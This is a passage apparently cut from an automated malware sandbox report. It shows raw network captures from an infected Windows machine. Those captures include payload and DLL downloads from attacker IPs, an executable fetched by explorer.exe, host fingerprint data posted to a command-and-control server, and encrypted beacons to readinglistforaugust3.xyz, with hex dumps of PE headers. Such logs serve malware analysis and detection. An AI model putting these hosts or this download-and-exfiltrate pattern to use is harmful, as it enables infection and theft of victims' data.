00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#4gZgZgZnsZ[eZBcZYjZ_mZ^lZE[oZ[dZg[Z^mZZfZfZXfZRichgZPELb["!w@@=Tp}pT@.text `.rdataRT@@.datatG`"B@.rsrcpd@@.reloc}~h@B
Aug 24, 2021 08:49:28.026526928 CEST	15419	OUT	GET /softokn3.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:49:28.047096968 CEST	15421	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:28 GMT Content-Type: application/x-msdos-program Content-Length: 144848 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "235d0-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:49:28 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l$JOJOJOuOJO?oKNJO?oINJO?oONJO?oNNJOmKNJO-nKNJOKO~JO-nNNJO-nJNJO-nOJO-nHNJORichJOPELb["!bP@0x@`T(@l.text `.rdataDF@@.data @.rsrcx0@@.reloc`@@B
Aug 24, 2021 08:49:28.236414909 CEST	15571	OUT	GET /vcruntime140.dll HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Host: 188.34.200.103 Connection: Keep-Alive
Aug 24, 2021 08:49:28.257180929 CEST	15572	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:28 GMT Content-Type: application/x-msdos-program Content-Length: 83784 Connection: keep-alive Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT ETag: "14748-57aa1f0b0df80" Expires: Wed, 25 Aug 2021 06:49:28 GMT Cache-Control: max-age=86400 X-Cache-Status: EXPIRED X-Cache-Status: HIT Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@B
Aug 24, 2021 08:49:40.517106056 CEST	15677	OUT	POST / HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 4953 Host: 188.34.200.103 Connection: Keep-Alive Cache-Control: no-cache
Aug 24, 2021 08:49:40.517201900 CEST	15682	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 64 30 36 65 64 36 33 35 2d 36 38 66 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="hwid"d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963--1BEF0A57BE110FD467AContent-Disposition: form-data; name="os"Windows 10 Pro--1BEF0A57BE110FD467AContent-Disposition: fo
Aug 24, 2021 08:49:40.666610003 CEST	15682	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:49:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip Data Raw: 31 36 0d 0a 1f 8b 08 00 00 00 00 00 04 03 cb cf 06 00 47 dd dc 79 02 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 16Gy0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49720	185.49.70.90	2080	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:49:27.831813097 CEST	15240	OUT	GET /5.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 185.49.70.90:2080
Aug 24, 2021 08:49:27.855906010 CEST	15241	IN	HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 06:49:27 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="8j9n9abgc.exe" Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: application/octet-stream Data Raw: 32 39 36 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 4f ab 5e 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 50 01 00 00 7a 8a 02 00 00 00 00 1e 24 00 00 00 10 00 00 00 60 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 8b 02 00 04 00 00 00 e5 02 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 30 a0 01 00 51 00 00 00 f0 95 01 00 3c 00 00 00 00 b0 8a 02 98 c5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 61 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 7d 01 00 18 00 00 00 d8 7c 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 b0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 4f 01 00 00 10 00 00 00 50 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 81 40 00 00 00 60 01 00 00 42 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 f2 88 02 00 b0 01 00 00 3a 00 00 00 96 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 c5 00 00 00 b0 8a 02 00 c6 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 29600MZ@!L!This program cannot be run in DOS mode.$PELO^Pz$`@0Q<a }\|@`.text1OP `.rdata@`BT@@.data8:@.rsrc@@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49721	212.224.105.79	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:49:36.138014078 CEST	15669	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://readinglistforaugust3.xyz/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 423 Host: readinglistforaugust3.xyz
Aug 24, 2021 08:49:36.138118029 CEST	15669	OUT	Data Raw: 6c 9b 01 90 14 e9 9f 7a bf 75 0d 11 94 9b 21 14 10 ca a4 38 0b ba 19 d1 11 ce 49 17 54 dd a9 54 55 0d 5e 72 55 b1 63 f1 06 38 89 ca 6e e4 d4 f9 21 7f 77 58 ff 6b 8a 51 fb b3 a7 61 34 21 6a 3a a3 48 50 b5 80 1c 21 bc d5 4a 99 47 ba bf da fd e5 5c Data Ascii: lzu!8ITTU^rUc8n!wXkQa4!j:HP!JG\d@> F yK%0,X{j1RcGs85ZcbbEX''ix q]1UQ^nU[(lgB<`g+L&W\|P
Aug 24, 2021 08:49:36.182436943 CEST	15670	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 24 Aug 2021 06:49:36 GMT Content-Type: text/html; charset=utf-8 Content-Length: 413 Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 61 64 69 6e 67 6c 69 73 74 66 6f 72 61 75 67 75 73 74 33 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.10 (Debian) Server at readinglistforaugust3.xyz Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49766	188.119.112.104	80	C:\Users\user\AppData\Local\Temp\49B.exe

Timestamp	kBytes transferred	Direction	Data
Aug 24, 2021 08:50:15.384516001 CEST	17307	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 188.119.112.104
Aug 24, 2021 08:50:15.384542942 CEST	17307	OUT	Data Raw: 6f 32 78 74 51 66 33 41 51 48 4d 49 74 4c 32 4e 77 4f 74 46 70 4a 6c 77 57 70 61 47 45 4a 62 38 36 4e 35 53 36 52 62 44 5a 4c 46 2f 57 45 77 37 69 56 4a 33 61 6b 56 58 73 63 48 51 55 2f 54 32 35 50 4d 37 73 38 39 32 42 69 76 59 58 77 48 39 6b 4a Data Ascii: o2xtQf3AQHMItL2NwOtFpJlwWpaGEJb86N5S6RbDZLF/WEw7iVJ3akVXscHQU/T25PM7s892BivYXwH9kJU9qtB00oGH62MaPnhboL0046gCZQwMGdyRWaWb0gbct84=
Aug 24, 2021 08:50:15.660162926 CEST	17439	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 24 Aug 2021 06:50:15 GMT Content-Type: text/plain;charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Headers: * Access-Control-Allow-Origin: * Data Raw: 66 32 64 0d 0a 75 6e 4e 32 47 4b 2b 6e 50 6d 64 6f 30 39 50 39 6e 4f 55 41 79 2f 31 44 4a 4b 37 69 51 38 69 46 7a 70 6b 7a 6a 67 33 57 41 4f 56 4d 54 30 46 62 6e 33 38 48 62 51 5a 69 6a 4f 7a 6c 45 64 2b 34 77 4d 5a 34 7a 49 51 4b 58 33 62 78 57 56 36 51 2f 34 67 39 70 39 67 71 32 74 4f 4e 35 57 51 59 4f 53 4d 4b 6f 4c 38 7a 75 4b 63 43 50 77 38 50 52 4e 2b 56 58 4c 75 5a 6a 51 6d 63 37 63 55 4e 56 71 32 6b 45 2b 51 66 34 62 31 32 34 76 62 4c 37 58 61 79 44 53 66 6b 67 55 31 5a 48 73 6f 4f 76 4f 49 79 31 2f 78 65 66 7a 35 55 65 39 4c 6d 33 52 41 47 32 67 31 70 47 65 35 30 63 34 6b 55 59 5a 55 69 53 63 38 7a 4d 6f 34 46 6a 6a 6b 77 36 64 77 67 68 32 38 72 47 59 4d 71 4d 2b 52 39 50 34 7a 63 75 54 72 42 68 33 45 56 37 44 6e 73 73 68 55 6b 64 31 57 47 66 45 37 6c 4e 6e 6c 6b 49 33 36 38 2f 35 72 49 35 4d 68 77 48 69 4a 7a 58 4d 6f 58 6a 31 6a 62 76 78 4c 64 61 6c 76 50 66 66 58 48 67 67 5a 44 50 72 34 6c 66 45 6f 45 61 6a 79 43 73 47 53 73 71 37 4a 4e 78 59 55 65 4c 79 59 43 37 69 45 57 6f 79 46 6b 37 6b 51 4a 71 33 73 63 54 55 6a 6b 65 34 68 59 47 35 70 6b 41 6e 75 72 76 58 54 56 75 6b 46 31 69 4a 63 41 78 52 34 39 51 6d 73 36 6e 51 65 67 75 56 30 53 69 54 6d 49 33 64 33 69 65 66 51 70 41 73 54 61 51 53 68 6d 2b 42 39 4f 46 38 6e 6a 43 4a 2b 41 77 43 56 6d 4e 6a 31 56 34 55 59 6e 44 73 52 2f 64 39 78 54 57 35 74 69 50 66 79 67 37 35 6f 44 7a 32 4f 71 7a 70 61 50 65 53 73 4d 30 6d 65 43 30 4e 48 65 77 41 4d 34 63 66 7a 4c 2b 66 57 54 39 6f 4d 4c 2f 52 43 51 52 75 58 64 5a 79 31 78 2f 50 4b 4e 4e 33 58 52 4a 56 34 57 32 4f 43 74 71 5a 37 59 47 38 32 36 57 63 56 55 41 2f 2f 65 77 6f 48 4e 69 7a 58 53 4f 5a 55 49 79 31 2b 74 64 5a 32 4e 6a 75 6f 32 7a 47 64 78 42 30 53 42 2b 43 38 32 34 5a 54 36 62 31 45 2f 34 33 72 38 63 52 35 37 2f 6c 6a 4a 78 6e 77 4e 41 57 46 37 6d 49 51 30 71 73 35 6f 42 4f 76 55 31 57 69 39 75 67 4b 44 34 66 51 54 67 74 56 4b 2f 48 53 6f 57 62 78 50 54 38 78 67 4c 6a 78 5a 45 66 45 4c 76 34 6f 52 6a 47 57 7a 47 56 44 33 6e 32 2b 72 38 5a 6c 41 47 36 70 30 71 78 5a 72 72 30 61 6e 70 54 49 75 62 64 57 4c 49 36 45 49 70 48 4b 66 63 51 51 30 4e 30 45 77 76 43 70 59 2b 6f 74 4d 73 78 35 36 47 77 4c 6b 74 45 58 45 57 67 67 76 6f 36 39 56 50 38 4f 4b 4a 63 59 5a 35 54 4a 47 50 6a 4e 4a 58 33 31 49 4a 68 33 78 2b 51 6a 56 63 63 34 37 72 65 4c 72 42 38 38 79 57 2f 39 6c 36 58 56 71 2b 4f 4b 2f 76 67 7a 2f 37 30 79 54 64 7a 51 7a 45 79 6d 79 65 6c 49 5a 6a 30 6c 6c 32 6f 53 35 35 69 67 37 51 6d 53 32 50 38 70 36 68 4e 4b 64 4f 4b 70 72 61 55 69 76 62 6a 58 76 55 37 70 66 2f 57 43 63 4c 64 78 33 32 36 65 4d 74 4d 48 54 75 68 54 38 6f 4d 79 73 6d 58 4d 79 73 2f 63 68 39 55 58 71 69 30 45 6a 4f 59 69 6f 42 51 45 33 37 74 2f 62 7a 4f 56 54 34 54 4d 39 78 52 4c 58 70 48 44 58 6e 79 32 51 67 45 4f 71 6c 6a 4c 47 73 6b 54 56 4f 59 72 2b 6c 69 37 70 4f 4b 73 65 30 50 2b 78 76 42 72 4c 49 76 64 45 46 44 49 68 49 59 38 6f 38 72 36 30 58 31 67 6d 5a 2f 6f 68 6e 62 58 70 51 38 4a 71 68 68 45 50 68 58 75 6d 33 4c 61 43 4a 71 55 73 77 35 48 2b 66 56 30 75 51 6e 6a 79 6f 50 70 4f 75 77 36 76 38 2b 71 4e 48 77 4c 49 6e 6a 73 79 69 2b 72 75 61 45 39 53 56 4f 52 54 56 64 46 68 72 65 2b 58 4b 63 54 4e 73 64 6c 6b 6c 76 54 33 32 4d 36 48 68 75 69 44 30 37 72 62 6a 43 4a 53 69 65 41 61 69 73 38 64 33 5a 58 74 44 33 7a 56 71 68 36 4a 36 33 65 77 73 52 6a 48 34 68 63 76 79 64 4a 48 46 Data Ascii: f2dunN2GK+nPmdo09P9nOUAy/1DJK7iQ8iFzpkzjg3WAOVMT0Fbn38HbQZijOzlEd+4wMZ4zIQKX3bxWV6Q/4g9p9gq2tON5WQYOSMKoL8zuKcCPw8PRN+VXLuZjQmc7cUNVq2kE+Qf4b124vbL7XayDSfkgU1ZHsoOvOIy1/xefz5Ue9Lm3RAG2g1pGe50c4kUYZUiSc8zMo4Fjjkw6dwgh28rGYMqM+R9P4zcuTrBh3EV7DnsshUkd1WGfE7lNnlkI368/5rI5MhwHiJzXMoXj1jbvxLdalvPffXHggZDPr4lfEoEajyCsGSsq7JNxYUeLyYC7iEWoyFk7kQJq3scTUjke4hYG5pkAnurvXTVukF1iJcAxR49Qms6nQeguV0SiTmI3d3iefQpAsTaQShm+B9OF8njCJ+AwCVmNj1V4UYnDsR/d9xTW5tiPfyg75oDz2OqzpaPeSsM0meC0NHewAM4cfzL+fWT9oML/RCQRuXdZy1x/PKNN3XRJV4W2OCtqZ7YG826WcVUA//ewoHNizXSOZUIy1+tdZ2Njuo2zGdxB0SB+C824ZT6b1E/43r8cR57/ljJxnwNAWF7mIQ0qs5oBOvU1Wi9ugKD4fQTgtVK/HSoWbxPT8xgLjxZEfELv4oRjGWzGVD3n2+r8ZlAG6p0qxZrr0anpTIubdWLI6EIpHKfcQQ0N0EwvCpY+otMsx56GwLktEXEWggvo69VP8OKJcYZ5TJGPjNJX31IJh3x+QjVcc47reLrB88yW/9l6XVq+OK/vgz/70yTdzQzEymyelIZj0ll2oS55ig7QmS2P8p6hNKdOKpraUivbjXvU7pf/WCcLdx326eMtMHTuhT8oMysmXMys/ch9UXqi0EjOYioBQE37t/bzOVT4TM9xRLXpHDXny2QgEOqljLGskTVOYr+li7p